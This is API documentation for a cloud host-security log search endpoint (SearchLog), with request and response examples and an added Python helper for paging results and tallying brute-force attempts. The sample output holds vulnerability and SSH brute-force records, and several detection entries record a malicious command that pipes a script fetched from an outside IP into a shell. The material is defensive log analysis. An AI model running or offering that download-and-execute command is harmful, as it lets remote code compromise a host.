1. API Description
API request domain: cwp.tencentcloudapi.com.
Queries logs.
Default API request rate limit: 20 requests/second.
We recommend using API Explorer
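API Explorer provides online invocation, signature verification, SDK code generation, and quick API lookup. You can view the request and the response of each call, as well as automatically generated SDK call examples.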
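2. Input Parameters
The following request parameter list only includes the API request parameters and some common parameters. For the complete list of common parameters, see Common Request Parameters.
Parameter | Required | Type | Description |
---|---|---|---|
Action | Yes | String | Common parameter. Value for this API: SearchLog. |
Version | Yes | String | Common parameter. Value for this API: 2018-02-28. |
Region | No | String | Common parameter. This parameter is optional. |
StartTime | Yes | Integer | Start time of the logs to search and analyze, as a Unix timestamp (milliseconds). Example value: 1656641065449 |
EndTime | Yes | Integer | End time of the logs to search and analyze, as a Unix timestamp (milliseconds). Example value: 1656641965449 |
QueryString | Yes | String | Search and analysis statement, maximum length 12 KB. Example value: status: "异常登录" AND public_ip_addresses: (1* OR 2* OR 3* OR 4* OR 5* OR 6* OR 7* OR 8* OR 9*) AND NOT hostip: (10.128.200.* OR 10.129.24.212) AND NOT src_ip: (10.128.128.7 OR 192.144.182.173) AND NOT username: **** |
Count | No | Integer | Number of raw logs returned by a single query, maximum 1000. Use the Context parameter to fetch subsequent logs. Example value: 20 |
Sort | No | String | Whether raw logs are returned sorted by time. Valid values: asc (ascending), desc (descending). Default: desc. Example value: desc |
Context | No | String | Pass through the Context value returned by the previous call to fetch more logs. At most 10,000 raw logs can be fetched in total. The Context expires after 1 hour. Example value: search |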
3. Output Parameters
Parameter | Type | Description |
---|---|---|
Count | Integer | Number of raw logs matching the search criteria. Example value: 17 |
Context | String | Pass through the Context value returned by this call to fetch more logs. The Context expires after 1 hour. Example value: content |
ListOver | Boolean | Whether all logs matching the search criteria have been returned. If not, use the Context parameter to fetch more logs. Example value: false |
Analysis | Boolean | Whether the returned result is a statistical analysis (i.e. SQL) result. Example value: false |
Data | Array of LogInfo | Raw logs matching the search criteria. Example value: { "Content": "{\"create_time\":\"2022-07-01 10:00:27 +0800 CST\",\"hostip\":\"10.0.0.6\",\"level\":\"中危\",\"modify_time\":\"2022-07-01 10:17:05 +0800 CST\",\"remark\":\"\",\"uuid\":\"13bb1e16-9a7a-434d-9686-4328f72c97d7\",\"is_emergency\":\"False\",\"reference\":\"https://www.phpmyadmin.net/security/PMASA-2016-20/\",\"path\":\"/var/www/html/phpmyadmin\",\"fix\":\"1、建议升级到官方最新版本,官网地址:https://www.phpmyadmin.net\",\"cve_id\":\"CVE-2016-5704\",\"cls_event_type\":\"Web-CMS_vul\",\"appid\":\"1256299843\",\"name\":\"phpMyAdmin 4.6.x 表结构页面存在XSS漏洞\",\"id\":\"771\",\"vul_category\":\"Web-CMS漏洞\",\"descript\":\"漏洞文件路径: /var/www/html/phpmyadmin/templates/table/structure/display_table_stats.phtml\",\"event_status\":\"modify\",\"status\":\"待处理\"}", "FileName": "filename", "Source": "30.46.128.22", "TimeStamp": 1656641946000 } |
RequestId | String | Unique request ID, generated by the server and returned with every request (a request that fails to reach the server for other reasons does not get a RequestId). Provide the RequestId of the request when troubleshooting. |
4. Examples
Example 1
Input example
POST / HTTP/1.1
Host: cwp.tencentcloudapi.com
Content-Type: application/json
X-TC-Action: SearchLog
<Common request parameters>
{
"Sort": "desc",
"Count": 20,
"QueryString": "status: \"异常登录\" AND public_ip_addresses: (1* OR 2* OR 3* OR 4* OR 5* OR 6* OR 7* OR 8* OR 9*) AND NOT hostip: (10.128.200.* OR 10.129.24.212) AND NOT src_ip: (10.128.128.7 OR 192.144.182.173) AND NOT username: ****",
"StartTime": 1656641065449,
"EndTime": 1656641965449
}
Output example
{
"Response": {
"Analysis": false,
"Context": "content",
"Count": 17,
"Data": [
{
"Content": "{\"create_time\":\"2022-07-01 10:00:27 +0800 CST\",\"hostip\":\"10.0.0.6\",\"level\":\"中危\",\"modify_time\":\"2022-07-01 10:17:05 +0800 CST\",\"remark\":\"\",\"uuid\":\"13bb1e16-9a7a-434d-9686-4328f72c97d7\",\"is_emergency\":\"False\",\"reference\":\"https://www.phpmyadmin.net/security/PMASA-2016-20/\",\"path\":\"/var/www/html/phpmyadmin\",\"fix\":\"1、建议升级到官方最新版本,官网地址:https://www.phpmyadmin.net\",\"cve_id\":\"CVE-2016-5704\",\"cls_event_type\":\"Web-CMS_vul\",\"appid\":\"1256299843\",\"name\":\"phpMyAdmin 4.6.x 表结构页面存在XSS漏洞\",\"id\":\"771\",\"vul_category\":\"Web-CMS漏洞\",\"descript\":\"漏洞文件路径: /var/www/html/phpmyadmin/templates/table/structure/display_table_stats.phtml\",\"event_status\":\"modify\",\"status\":\"待处理\"}",
"FileName": "file***",
"Source": "30.46.128.22",
"TimeStamp": 1656641946000
},
{
"Content": "{\"create_time\":\"2022-07-01 10:00:27 +0800 CST\",\"hostip\":\"10.0.0.6\",\"level\":\"高危\",\"modify_time\":\"2022-07-01 10:17:05 +0800 CST\",\"remark\":\"\",\"uuid\":\"13bb1e16-9a7a-434d-9686-4328f72c97d7\",\"is_emergency\":\"False\",\"reference\":\"https://httpd.apache.org/security/vulnerabilities_24.html\",\"path\":\"\",\"fix\":\"升级至2.4.6-90及以上版本或 2.4.39及以上版本\",\"cve_id\":\"CVE-2019-0217\",\"cls_event_type\":\"application_vul\",\"appid\":\"1256299843\",\"name\":\"Apache HTTP Server mod_auth_digest 条件竞争漏洞\",\"id\":\"767\",\"vul_category\":\"应用漏洞\",\"descript\":\"Apache HTTP Server 启用了 mod_auth_digest 模块,且Apache HTTP Server 版本为:2.4.37-47.module_el8.6.0+1111+ce6f4ceb.1。\",\"event_status\":\"modify\",\"status\":\"待处理\"}",
"FileName": "file***",
"Source": "30.46.128.22",
"TimeStamp": 1656641946000
},
{
"Content": "{\"create_time\":\"2022-07-01 10:00:27 +0800 CST\",\"hostip\":\"10.0.0.6\",\"level\":\"中危\",\"modify_time\":\"2022-07-01 10:17:05 +0800 CST\",\"remark\":\"\",\"uuid\":\"13bb1e16-9a7a-434d-9686-4328f72c97d7\",\"is_emergency\":\"True\",\"reference\":\"https://www.phpmyadmin.net/security/PMASA-2016-19/\",\"path\":\"/var/www/html/phpmyadmin\",\"fix\":\"1、建议升级到官方最新版本,官网地址:https://www.phpmyadmin.net\",\"cve_id\":\"CVE-2016-5703\",\"cls_event_type\":\"emergency_vul\",\"appid\":\"1256299843\",\"name\":\"phpMyAdmin central_columns.lib.php SQL注入漏洞\",\"id\":\"772\",\"vul_category\":\"Web-CMS漏洞\",\"descript\":\"漏洞文件路径: /var/www/html/phpmyadmin/libraries/central_columns.lib.php\",\"event_status\":\"modify\",\"status\":\"待处理\"}",
"FileName": "file***",
"Source": "30.46.128.22",
"TimeStamp": 1656641946000
},
{
"Content": "{\"create_time\":\"2022-07-01 10:00:27 +0800 CST\",\"hostip\":\"10.0.0.6\",\"level\":\"高危\",\"modify_time\":\"2022-07-01 10:17:05 +0800 CST\",\"remark\":\"\",\"uuid\":\"13bb1e16-9a7a-434d-9686-4328f72c97d7\",\"is_emergency\":\"False\",\"reference\":\"https://www.seebug.org/vuldb/ssvid-92512\",\"path\":\"/var/www/html/phpmyadmin\",\"fix\":\"1、升级到最新版本,官网地址:https://www.phpmyadmin.net\",\"cve_id\":\"CVE-2016-6633\",\"cls_event_type\":\"Web-CMS_vul\",\"appid\":\"1256299843\",\"name\":\"phpMyAdmin dbase extension 远程代码执行漏洞\",\"id\":\"764\",\"vul_category\":\"Web-CMS漏洞\",\"descript\":\"漏洞文件路径: /var/www/html/phpmyadmin/libraries/zip_extension.lib.php\",\"event_status\":\"modify\",\"status\":\"待处理\"}",
"FileName": "file***",
"Source": "30.46.128.22",
"TimeStamp": 1656641946000
},
{
"Content": "{\"create_time\":\"2022-07-01 10:00:27 +0800 CST\",\"hostip\":\"10.0.0.6\",\"level\":\"中危\",\"modify_time\":\"2022-07-01 10:17:05 +0800 CST\",\"remark\":\"\",\"uuid\":\"13bb1e16-9a7a-434d-9686-4328f72c97d7\",\"is_emergency\":\"False\",\"reference\":\"https://httpd.apache.org/security/vulnerabilities_24.html#CVE-2020-9490\",\"path\":\"\",\"fix\":\"升级 Apache HTTP Server到 2.4.46 版本\",\"cve_id\":\"CVE-2020-9490\",\"cls_event_type\":\"application_vul\",\"appid\":\"1256299843\",\"name\":\"Apache HTTP Server http2_module 拒绝服务漏洞\",\"id\":\"769\",\"vul_category\":\"应用漏洞\",\"descript\":\"Apache HTTP Server 启用了 mod_http2 模块,且Apache HTTP Server版本为:2.4.37-47.module_el8.6.0+1111+ce6f4ceb.1。\",\"event_status\":\"modify\",\"status\":\"待处理\"}",
"FileName": "file***",
"Source": "30.46.128.22",
"TimeStamp": 1656641946000
},
{
"Content": "{\"create_time\":\"2022-07-01 10:00:27 +0800 CST\",\"hostip\":\"10.0.0.6\",\"level\":\"高危\",\"modify_time\":\"2022-07-01 10:17:05 +0800 CST\",\"remark\":\"\",\"uuid\":\"13bb1e16-9a7a-434d-9686-4328f72c97d7\",\"is_emergency\":\"True\",\"reference\":\"https://www.seebug.org/vuldb/ssvid-92209\",\"path\":\"/var/www/html/phpmyadmin\",\"fix\":\"1、建议升级至官方最新版本并且避免使用弱密码;\",\"cve_id\":\"CVE-2016-5734\",\"cls_event_type\":\"emergency_vul\",\"appid\":\"1256299843\",\"name\":\"phpMyAdmin授权用户远程命令执行漏洞\",\"id\":\"768\",\"vul_category\":\"Web-CMS漏洞\",\"descript\":\"漏洞文件路径: /var/www/html/phpmyadmin/libraries/controllers/table/TableSearchController.php\",\"event_status\":\"modify\",\"status\":\"待处理\"}",
"FileName": "file***",
"Source": "30.46.128.22",
"TimeStamp": 1656641946000
},
{
"Content": "{\"create_time\":\"2022-07-01 10:00:27 +0800 CST\",\"hostip\":\"10.0.0.6\",\"level\":\"高危\",\"modify_time\":\"2022-07-01 10:17:05 +0800 CST\",\"remark\":\"\",\"uuid\":\"13bb1e16-9a7a-434d-9686-4328f72c97d7\",\"is_emergency\":\"False\",\"reference\":\"https://www.phpmyadmin.net/security/PMASA-2016-40/\",\"path\":\"/var/www/html/phpmyadmin\",\"fix\":\"1、建议升级到官方最新版本,官网地址:https://www.phpmyadmin.net\",\"cve_id\":\"CVE-2016-6617\",\"cls_event_type\":\"Web-CMS_vul\",\"appid\":\"1256299843\",\"name\":\"phpMyAdmin 4.6.x 导出功能SQL注入漏洞\",\"id\":\"765\",\"vul_category\":\"Web-CMS漏洞\",\"descript\":\"漏洞文件路径: /var/www/html/phpmyadmin/libraries/display_export.lib.php\",\"event_status\":\"modify\",\"status\":\"待处理\"}",
"FileName": "file***",
"Source": "30.46.128.22",
"TimeStamp": 1656641946000
},
{
"Content": "{\"create_time\":\"2022-07-01 10:00:27 +0800 CST\",\"hostip\":\"10.0.0.6\",\"level\":\"高危\",\"modify_time\":\"2022-07-01 10:17:05 +0800 CST\",\"remark\":\"\",\"uuid\":\"13bb1e16-9a7a-434d-9686-4328f72c97d7\",\"is_emergency\":\"False\",\"reference\":\"https://www.phpmyadmin.net/security/PMASA-2016-25/\",\"path\":\"/var/www/html/phpmyadmin\",\"fix\":\"1、建议升级到官方最新版本,官网地址:https://www.phpmyadmin.net\",\"cve_id\":\"CVE-2016-5732\",\"cls_event_type\":\"Web-CMS_vul\",\"appid\":\"1256299843\",\"name\":\"phpMyAdmin 4.6.x XSS漏洞\",\"id\":\"770\",\"vul_category\":\"Web-CMS漏洞\",\"descript\":\"漏洞文件路径: /var/www/html/phpmyadmin/templates/table/structure/display_partitions.phtml\",\"event_status\":\"modify\",\"status\":\"待处理\"}",
"FileName": "file***",
"Source": "30.46.128.22",
"TimeStamp": 1656641946000
},
{
"Content": "{\"create_time\":\"2022-07-01 10:00:27 +0800 CST\",\"hostip\":\"10.0.0.6\",\"level\":\"中危\",\"modify_time\":\"2022-07-01 10:17:05 +0800 CST\",\"remark\":\"\",\"uuid\":\"13bb1e16-9a7a-434d-9686-4328f72c97d7\",\"is_emergency\":\"False\",\"reference\":\"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11984\",\"path\":\"\",\"fix\":\"升级至2.4.44及以上版本\",\"cve_id\":\"CVE-2020-11984\",\"cls_event_type\":\"application_vul\",\"appid\":\"1256299843\",\"name\":\"Apache HTTP Server mod_proxy_uwsgi 缓冲区溢出漏洞\",\"id\":\"766\",\"vul_category\":\"应用漏洞\",\"descript\":\"Apache HTTP Server 启用了 mod_proxy_uwsgi 模块,且版本为:2.4.37-47.module_el8.6.0+1111+ce6f4ceb.1。\",\"event_status\":\"modify\",\"status\":\"待处理\"}",
"FileName": "file***",
"Source": "30.46.128.22",
"TimeStamp": 1656641946000
},
{
"Content": "{\"create_time\":\"2022-06-30 11:01:55 +0800 CST\",\"hostip\":\"172.16.48.133\",\"modify_time\":\"2022-07-01 10:15:23 +0800 CST\",\"count\":\"3380\",\"uuid\":\"e1f081aa-7777-4fdf-a2f7-88f3faa3d302\",\"src_ip\":\"82.157.124.14\",\"src_machine_name\":\"ssh\",\"event_type\":\"暴破失败\",\"appid\":\"1256299843\",\"cls_event_type\":\"bruteattack\",\"dst_port\":\"22\",\"location\":\"北京-北京市\",\"banned\":\"未阻断(非专业版、非旗舰版)\",\"id\":\"202226000001705\",\"event_status\":\"modify\",\"status\":\"待处理\",\"username\":\"root\"}",
"FileName": "file***",
"Source": "30.46.128.22",
"TimeStamp": 1656641844000
},
{
"Content": "{\"create_time\":\"2022-06-30 11:01:55 +0800 CST\",\"hostip\":\"172.16.48.133\",\"modify_time\":\"2022-07-01 10:15:23 +0800 CST\",\"count\":\"3380\",\"uuid\":\"e1f081aa-7777-4fdf-a2f7-88f3faa3d302\",\"src_ip\":\"82.157.124.14\",\"src_machine_name\":\"ssh\",\"event_type\":\"暴破失败\",\"appid\":\"1256299843\",\"cls_event_type\":\"bruteattack\",\"dst_port\":\"22\",\"location\":\"北京-北京市\",\"banned\":\"未阻断(非专业版、非旗舰版)\",\"id\":\"202226000001705\",\"event_status\":\"modify\",\"status\":\"待处理\",\"username\":\"root\"}",
"FileName": "file***",
"Source": "30.46.128.22",
"TimeStamp": 1656641824000
},
{
"Content": "{\"create_time\":\"2022-07-01 10:10:03 +0800 CST\",\"hostip\":\"172.16.0.49\",\"rule_name\":\"1003.恶意命令-下载&执行未知程序\",\"modify_time\":\"0001-01-01 00:00:00 +0000 UTC\",\"rule_level\":\"高危\",\"uuid\":\"7168bc08-c1b8-11ea-9053-48fd8e5f474c\",\"platform\":\"Linux64\",\"appid\":\"1256299843\",\"cls_event_type\":\"bash\",\"exec_time\":\"2022-07-01 10:10:01 +0800 CST\",\"id\":\"3141559\",\"bash_cmd\":\"/bin/sh -c curl 43.129.65.101/1.sh|sh\",\"user\":\"0:0\",\"event_status\":\"create\",\"status\":\"待处理\"}",
"FileName": "file***",
"Source": "30.46.128.22",
"TimeStamp": 1656641520000
},
{
"Content": "{\"create_time\":\"2022-07-01 07:44:58 +0800 CST\",\"hostip\":\"172.16.48.79\",\"modify_time\":\"2022-07-01 10:09:23 +0800 CST\",\"count\":\"349\",\"uuid\":\"93137e79-ae2e-4677-95ac-23a5024607b1\",\"src_ip\":\"110.40.168.164\",\"src_machine_name\":\"ssh\",\"event_type\":\"暴破失败\",\"appid\":\"1256299843\",\"cls_event_type\":\"bruteattack\",\"dst_port\":\"22\",\"location\":\"上海-上海市\",\"banned\":\"未阻断(非专业版、非旗舰版)\",\"id\":\"202226000001999\",\"event_status\":\"modify\",\"status\":\"待处理\",\"username\":\"root\"}",
"FileName": "file***",
"Source": "30.46.128.22",
"TimeStamp": 1656641484000
},
{
"Content": "{\"create_time\":\"2022-07-01 07:44:58 +0800 CST\",\"hostip\":\"172.16.48.79\",\"modify_time\":\"2022-07-01 10:09:23 +0800 CST\",\"count\":\"349\",\"uuid\":\"93137e79-ae2e-4677-95ac-23a5024607b1\",\"src_ip\":\"110.40.168.164\",\"src_machine_name\":\"ssh\",\"event_type\":\"暴破失败\",\"appid\":\"1256299843\",\"cls_event_type\":\"bruteattack\",\"dst_port\":\"22\",\"location\":\"上海-上海市\",\"banned\":\"未阻断(非专业版、非旗舰版)\",\"id\":\"202226000001999\",\"event_status\":\"modify\",\"status\":\"待处理\",\"username\":\"root\"}",
"FileName": "file***",
"Source": "30.46.128.22",
"TimeStamp": 1656641464000
},
{
"Content": "{\"create_time\":\"2022-07-01 10:07:04 +0800 CST\",\"hostip\":\"172.16.0.49\",\"rule_name\":\"1003.恶意命令-下载&执行未知程序\",\"modify_time\":\"0001-01-01 00:00:00 +0000 UTC\",\"rule_level\":\"高危\",\"uuid\":\"7168bc08-c1b8-11ea-9053-48fd8e5f474c\",\"platform\":\"Linux64\",\"appid\":\"1256299843\",\"cls_event_type\":\"bash\",\"exec_time\":\"2022-07-01 10:07:01 +0800 CST\",\"id\":\"3141558\",\"bash_cmd\":\"/bin/sh -c curl 43.129.65.101/1.sh|sh\",\"user\":\"0:0\",\"event_status\":\"create\",\"status\":\"待处理\"}",
"FileName": "file***",
"Source": "30.46.128.22",
"TimeStamp": 1656641280000
},
{
"Content": "{\"create_time\":\"2022-07-01 10:05:04 +0800 CST\",\"hostip\":\"172.16.0.49\",\"rule_name\":\"1003.恶意命令-下载&执行未知程序\",\"modify_time\":\"0001-01-01 00:00:00 +0000 UTC\",\"rule_level\":\"高危\",\"uuid\":\"7168bc08-c1b8-11ea-9053-48fd8e5f474c\",\"platform\":\"Linux64\",\"appid\":\"1256299843\",\"cls_event_type\":\"bash\",\"exec_time\":\"2022-07-01 10:05:01 +0800 CST\",\"id\":\"3141557\",\"bash_cmd\":\"/bin/sh -c curl 43.129.65.101/1.sh|sh\",\"user\":\"0:0\",\"event_status\":\"create\",\"status\":\"待处理\"}",
"FileName": "file***",
"Source": "30.46.128.22",
"TimeStamp": 1656641160000
},
{
"Content": "{\"create_time\":\"2022-07-01 10:04:05 +0800 CST\",\"hostip\":\"172.16.0.49\",\"rule_name\":\"1003.恶意命令-下载&执行未知程序\",\"modify_time\":\"0001-01-01 00:00:00 +0000 UTC\",\"rule_level\":\"高危\",\"uuid\":\"7168bc08-c1b8-11ea-9053-48fd8e5f474c\",\"platform\":\"Linux64\",\"appid\":\"1256299843\",\"cls_event_type\":\"bash\",\"exec_time\":\"2022-07-01 10:04:01 +0800 CST\",\"id\":\"3141556\",\"bash_cmd\":\"/bin/sh -c curl 43.129.65.101/1.sh|sh\",\"user\":\"0:0\",\"event_status\":\"create\",\"status\":\"待处理\"}",
"FileName": "file***",
"Source": "30.46.128.22",
"TimeStamp": 1656641160000
}
],
"ListOver": true,
"RequestId": "e6bb2f6d-10b3-40fd-b3a4-630dbdf477c3"
}
}
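The following added example (not part of the original documentation or the Tencent Cloud SDK) pages through SearchLog results by following Context until ListOver is true, decodes the string-encoded Content field, and totals brute-force attempts per source, counting each event id once because the same id can appear in several records, as in the output above. The function names, the `send` transport callable, and the data in `fake_send` are assumptions constructed for illustration.

```python
import json
from collections import defaultdict

MAX_COUNT, MAX_TOTAL, MAX_QUERY_BYTES = 1000, 10000, 12 * 1024  # limits stated in the tables

def decode(item):
    """Data[].Content is JSON serialized into a string, so it needs a second decode."""
    try:
        event = json.loads(item["Content"])
    except (KeyError, TypeError, ValueError):
        event = None
    return event if isinstance(event, dict) else {"_raw": item.get("Content")}

def search_all(send, query, start_ms, end_ms, count=MAX_COUNT):
    """Follow Context until ListOver. `send` (hypothetical) takes the request
    parameters as a dict and returns the "Response" object as a dict."""
    if not 1 <= count <= MAX_COUNT or len(query.encode("utf-8")) > MAX_QUERY_BYTES:
        raise ValueError("Count or QueryString exceeds the documented limits")
    params = {"QueryString": query, "StartTime": start_ms, "EndTime": end_ms,
              "Count": count, "Sort": "desc"}
    events = []
    while len(events) < MAX_TOTAL:
        resp = send(dict(params))
        data = resp.get("Data") or []
        events += [decode(item) for item in data]
        # Stop on the last page, or if the server gives nothing to continue with.
        if resp.get("ListOver") or not data or not resp.get("Context"):
            break
        params["Context"] = resp["Context"]
    return events[:MAX_TOTAL]

def brute_force_totals(events):
    """Sum `count` per (src_ip, hostip) for bruteattack events, one row per event id."""
    seen, totals = set(), defaultdict(int)
    for e in events:
        if e.get("cls_event_type") != "bruteattack" or e.get("id") in seen:
            continue
        seen.add(e.get("id"))
        totals[(e.get("src_ip"), e.get("hostip"))] += int(e.get("count") or 0)
    return dict(totals)

def fake_send(params):
    """Constructed two-page stand-in for the API; all values are made up."""
    rec = lambda **kw: {"Content": json.dumps(kw), "TimeStamp": 0}
    brute = rec(cls_event_type="bruteattack", id="1", src_ip="203.0.113.7",
                hostip="10.0.0.6", count="40")
    if "Context" not in params:
        return {"Data": [brute], "Context": "page2", "ListOver": False}
    return {"Data": [brute, rec(cls_event_type="bash", id="2"),
                     {"Content": "not json"}], "ListOver": True}
```

In real use, `send` would wrap a signed call to the SearchLog action; records whose Content cannot be decoded are kept under `_raw` so they are not silently lost.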
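5. Developer Resources
Tencent Cloud API Platform
The Tencent Cloud API Platform is a unified lookup platform that brings together API documentation, error codes, API Explorer, SDKs and other resources, so that you can look up and use all API services provided by Tencent Cloud from a single entry point.
API Inspector
With API Inspector you can view the API calls associated with each console operation and automatically generate API code in various languages. You can also go to API Explorer for online debugging.
SDK
Cloud API 3.0 provides a companion set of development tools (SDKs) that support multiple programming languages and make it easier to call the API.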
- Tencent Cloud SDK 3.0 for Python: GitHub Gitee
- Tencent Cloud SDK 3.0 for Java: GitHub Gitee
- Tencent Cloud SDK 3.0 for PHP: GitHub Gitee
- Tencent Cloud SDK 3.0 for Go: GitHub Gitee
- Tencent Cloud SDK 3.0 for Node.js: GitHub Gitee
- Tencent Cloud SDK 3.0 for .NET: GitHub Gitee
- Tencent Cloud SDK 3.0 for C++: GitHub Gitee
- Tencent Cloud SDK 3.0 for Ruby: GitHub Gitee
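Command-line tools
6. Error Codes
This API currently has no error codes related to business logic. For other error codes, see Common Error Codes.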